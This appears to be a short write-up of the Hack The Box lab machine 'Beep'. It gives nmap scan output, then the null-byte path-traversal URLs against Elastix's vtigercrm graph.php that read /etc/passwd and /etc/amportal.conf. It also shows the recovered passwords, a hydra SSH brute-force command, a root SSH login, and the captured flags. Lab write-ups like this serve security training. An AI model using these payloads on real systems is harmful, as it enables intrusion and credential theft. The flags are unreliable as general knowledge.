[Meachines] [Easy] Beep Elastix-CMS-LFI
信息收集
| IP Address | Opening Ports |
|---|---|
| 10.10.10.7 | TCP:22, 25, 80, 110, 111, 143, 443, 993, 995, 3306 |
$ nmap -p- 10.10.10.7 --min-rate 1000 -sC -sV
Nmap scan report for 10.10.10.7 (10.10.10.7)
Host is up (0.53s latency).
Not shown: 65486 filtered tcp ports (no-response), 39 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open tcpwrapped
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
25/tcp open tcpwrapped
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp open tcpwrapped
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp open tcpwrapped
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
111/tcp open tcpwrapped
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 790/udp status
|_ 100024 1 793/tcp status
143/tcp open tcpwrapped
|_imap-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
443/tcp open tcpwrapped
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after: 2018-04-07T08:22:08
|_ssl-date: 2024-07-27T13:37:25+00:00; -8m22s from scanner time.
993/tcp open tcpwrapped
995/tcp open tcpwrapped
3306/tcp open tcpwrapped
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)Host script results:
|_clock-skew: -8m22s
Local & Root
https://www.exploit-db.com/exploits/37637
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../../etc/passwd%00&module=Accounts&action
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../etc/amportal.conf%00&module=Accounts&action
password:passw0rd,jEhdIekWmdjE
$ hydra -L user -P pass ssh://10.10.10.7
username:root
password:jEhdIekWmdjE
$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa,ssh-dss root@10.10.10.7
User.txt
[root@beep admin]# cat /home/fanis/user.txt
720a9847b4fbc17c9cfc33cade7ccf12
Root.txt
[root@beep admin]# cat /root/root.txt
af8c187aa4514c55128bfd29473e5a87